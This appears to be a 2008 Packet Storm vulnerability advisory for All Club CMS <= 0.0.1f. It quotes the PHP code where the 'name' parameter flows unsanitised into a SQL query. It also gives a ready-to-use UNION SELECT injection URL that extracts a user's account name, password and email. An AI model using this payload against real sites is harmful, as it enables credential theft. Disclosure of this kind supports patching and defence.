allclub-sql.txt

2008-02-06T00:00:00
ID PACKETSTORM:63307
Type packetstorm
Reporter ka0x
Modified 2008-02-06T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
  
bug found by ka0x  
D.O.M TEAM 2008  
we are: ka0x, an0de, xarnuz  
http://www.domlabs.org/  
  
Script affected: All Club CMS  
Vulnerability: Remote SQL Injection  
  
Download: http://sourceforge.net/project/showfiles.php?group_id=209058  
need magic_quotes_gpc = off  
  
  
vuln code:  
  
[...]  
  
if (isset($_GET['name']) && (!(empty($_GET['name'])))) {  
  
$name = $_GET['name'];  
$name = stripslashes($name);  
// stop hackers  
if (eregi("http\:\/\/", $name)) {  
echo "<br />  No go on the hack attempt.<br />";  
// log attempt, from IP, etc.  
if ($SYS_SET['ban_attack_ip']) {  
// ban ip if ban_attack_ip  
}  
die();  
}  
  
$sth = $dbh->prepare("SELECT * FROM accms_modules WHERE name='$name'");  
  
[...]  
  
  
Stripslashes function only deletes backslashes (\) and the backslashes  
doubles (\\) becomes simple (\).  
  
  
Exploit:  
http://[host]/accms_path/index.php?name=-1'/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6,7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/*  
  
  
__EOF__  
`